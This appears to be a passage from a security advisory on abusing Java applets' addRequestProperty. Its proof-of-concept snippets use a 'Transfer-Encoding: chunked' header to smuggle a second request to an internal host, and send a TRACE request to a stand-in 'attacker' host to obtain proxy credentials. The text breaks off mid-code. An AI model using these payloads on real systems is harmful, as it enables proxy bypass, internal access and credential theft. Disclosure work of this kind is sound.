It is possible abuse the method AddRequestProperty to:
- inject new requests by abusing the request header Transfer-Encoding. The result is a well known attack called Http Request Splitting [1][2][3].
- gather information about the existence of a Http Proxy.
Analysis
Applets sandbox allow requests to be performed to the host where they originate by using the class java.net.URL. This is allowed according to Java SOP.
Example:
f=new Packages.java.net.URL("http://appletoriginatinghost/")
g=f.openConnection();
g.setDoOutput(true);
g.setRequestMethod("GET") ;
dis2.flush();
dis2.close();
g.connect();
dis = new Packages.java.io.DataInputStream(g.getInputStream());
while((rl=dis.readLine())!=null){
log(rl) ;
}
We found that is possible to force a split of a Http request by using
Request.addRequestProperty("Transfer-Encoding", "chunked");
This could be used by a malicious user to bypass access in case a
forward proxy is set.
In fact by setting the request header to Transfer-Encoding: chunked
the payload will be parsed according to rfc2616 :
f=new Packages.java.net.URL("http://appletoriginatinghost/")
g=f.openConnection();
g.setDoOutput(true);
g.setRequestMethod("GET") ;
g.addRequestProperty("Transfer-Encoding", "chunked");
dis2 = new Packages.java.io.DataOutputStream(g.getOutputStream());
dis2.writeBytes("0\n\nGET http://someinternalHost HTTP/1.1\nHost: 10.1.1.1
\n\n");
dis2.flush();
dis2.close();
g.connect();
dis = new Packages.java.io.DataInputStream(g.getInputStream());
while((rl=dis.readLine())!=null){
log(rl) ;
}
Also it can be abused to get forward proxy information such as proxy password.
f=new Packages.java.net.URL("http://attacker/")
g=f.openConnection();
g.setRequestMethod("TRACE") ;
g.addRequestProperty("Max-Forwards", "0");
g.connect();
dis = new Packages.java.io.DataInputStream(g.getInputStream());
i=0
while(i<350){>